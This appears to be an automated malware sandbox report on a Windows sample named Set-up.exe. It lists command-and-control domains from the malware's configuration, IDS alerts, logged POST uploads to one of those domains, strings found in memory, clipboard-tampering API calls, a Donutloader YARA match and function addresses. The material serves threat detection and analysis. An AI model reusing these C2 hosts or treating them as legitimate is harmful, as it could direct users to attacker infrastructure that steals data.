C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: jammywritej.click

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.87.112:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.87.112:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: jammywritej.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: jammywritej.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5YD6ZCQRKQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: jammywritej.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X9PKIBZRGE0HEAOLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8767Host: jammywritej.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IBYOPCR6R5GSF8GGSPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: jammywritej.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IV9TAXW9RUFPCXLWNEYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1259Host: jammywritej.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3RDZ44UHNY26User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585323Host: jammywritej.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: jammywritej.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: jammywritej.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: jammywritej.click

Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Set-up.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Set-up.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Set-up.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: Set-up.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Set-up.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Set-up.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Set-up.exe	String found in binary or memory: http://www.dposoft.net0
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1876017378.000000001475D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1876017378.000000001475D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Set-up.exe, 00000000.00000003.1876017378.000000001475D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Set-up.exe, 00000000.00000003.1902853656.0000000001D7D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1923838942.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1942303556.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2910980842.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1979580618.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1903381866.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1979580618.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/
Source: Set-up.exe, 00000000.00000002.2910980842.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/&
Source: Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/:&Ut-
Source: Set-up.exe, 00000000.00000002.2910980842.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/U
Source: Set-up.exe, 00000000.00000003.1942303556.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1979580618.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/V
Source: Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2077215981.0000000014757000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1903381866.0000000001DA9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1942114981.0000000014751000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1923838942.0000000001DA7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851313938.0000000014761000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2910980842.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1979580618.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1923785589.0000000014757000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1874842905.0000000001DA9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850529822.0000000014760000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1899094694.0000000014757000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1874517497.0000000001DA6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1923838942.0000000001D7D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1981747629.0000000001D25000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1902853656.0000000001DA9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1898814978.0000000014757000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1874205874.0000000014754000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851104729.0000000014761000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1898926537.0000000014757000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1981747629.0000000001D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/api
Source: Set-up.exe, 00000000.00000003.1981747629.0000000001D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/api02Vu
Source: Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/apiN
Source: Set-up.exe, 00000000.00000003.1850656272.0000000014760000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851313938.0000000014761000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850529822.0000000014760000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851104729.0000000014761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/apie
Source: Set-up.exe, 00000000.00000003.1923838942.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/f
Source: Set-up.exe, 00000000.00000003.2078010033.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2910632304.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/pi
Source: Set-up.exe, 00000000.00000003.1874411651.0000000014757000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1874205874.0000000014754000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jammywritej.click/wTAAA=
Source: Set-up.exe, 00000000.00000003.1826958372.00000000147F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Set-up.exe, 00000000.00000003.1827113561.00000000147A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850736184.00000000147A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826958372.00000000147F3000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850623615.00000000147A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Set-up.exe, 00000000.00000003.1827113561.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Set-up.exe, 00000000.00000003.1827113561.00000000147A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850736184.00000000147A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826958372.00000000147F3000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850623615.00000000147A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Set-up.exe, 00000000.00000003.1827113561.0000000014782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1876017378.000000001475D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.87.112:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_092C1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

0_2_092C1000

Source: C:\Users\user\Desktop\Set-up.exe

0_2_092C1000

Source: C:\Users\user\Desktop\Set-up.exe

0_2_092C1000

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_01F1EF01 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

0_2_01F1EF01

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED0341	0_2_01ED0341
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F1EF01	0_2_01F1EF01
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE016E	0_2_01EE016E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0911E	0_2_01F0911E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EEB0EE	0_2_01EEB0EE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED70EE	0_2_01ED70EE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0D0FE	0_2_01F0D0FE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED50AE	0_2_01ED50AE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EEF0BE	0_2_01EEF0BE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFE08E	0_2_01EFE08E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EDC06E	0_2_01EDC06E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED0000	0_2_01ED0000
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED639E	0_2_01ED639E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F1037E	0_2_01F1037E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE02F9	0_2_01EE02F9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F112CE	0_2_01F112CE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EF728D	0_2_01EF728D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EEE282	0_2_01EEE282
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE7230	0_2_01EE7230
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0A5FE	0_2_01F0A5FE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFD5F9	0_2_01EFD5F9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0F5D7	0_2_01F0F5D7
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EEC58E	0_2_01EEC58E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EEF57E	0_2_01EEF57E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFD535	0_2_01EFD535
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F094AE	0_2_01F094AE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE2441	0_2_01EE2441
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EDB42D	0_2_01EDB42D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE9438	0_2_01EE9438
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFE41B	0_2_01EFE41B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFF6AF	0_2_01EFF6AF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F07691	0_2_01F07691
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED468E	0_2_01ED468E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFE08E	0_2_01EFE08E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFD65B	0_2_01EFD65B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFE61E	0_2_01EFE61E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0360E	0_2_01F0360E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F009CF	0_2_01F009CF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0C98E	0_2_01F0C98E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED796E	0_2_01ED796E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE992E	0_2_01EE992E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0892E	0_2_01F0892E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F1090E	0_2_01F1090E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EDA8BE	0_2_01EDA8BE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0386E	0_2_01F0386E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED8BCE	0_2_01ED8BCE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F08B8E	0_2_01F08B8E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EEFB4E	0_2_01EEFB4E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE2B48	0_2_01EE2B48
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED9A7E	0_2_01ED9A7E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED5A5E	0_2_01ED5A5E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE1A05	0_2_01EE1A05
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EF9DE8	0_2_01EF9DE8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01ED7DFE	0_2_01ED7DFE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EDDDDF	0_2_01EDDDDF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F00D97	0_2_01F00D97
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EF2D2E	0_2_01EF2D2E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EDAD2E	0_2_01EDAD2E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F07D27	0_2_01F07D27
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE0CE7	0_2_01EE0CE7
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EF7CDE	0_2_01EF7CDE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EFCC4A	0_2_01EFCC4A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE7C5A	0_2_01EE7C5A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F01C2E	0_2_01F01C2E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F10C0E	0_2_01F10C0E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F10F3E	0_2_01F10F3E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EECEE7	0_2_01EECEE7
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F09E7E	0_2_01F09E7E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01EE2E5E	0_2_01EE2E5E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01F0CE0E	0_2_01F0CE0E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_09187960	0_2_09187960
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0915A8B0	0_2_0915A8B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0917C8D0	0_2_0917C8D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0918FB10	0_2_0918FB10
